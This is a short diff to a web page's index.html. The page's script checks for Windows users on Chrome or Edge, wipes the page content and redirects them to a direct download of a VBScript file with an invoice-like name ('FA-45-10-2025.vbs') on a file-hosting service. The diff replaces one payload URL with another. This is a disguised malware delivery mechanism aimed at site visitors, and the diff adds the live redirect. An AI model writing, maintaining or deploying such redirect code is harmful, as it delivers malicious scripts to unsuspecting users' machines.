--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store-eu-gra-2.gofile.io/download/direct/56fa173c-2d12-4750-b520-cdec142818bb/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://store10.gofile.io/download/direct/bd5494a2-4fec-4e61-9946-14d38d378036/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
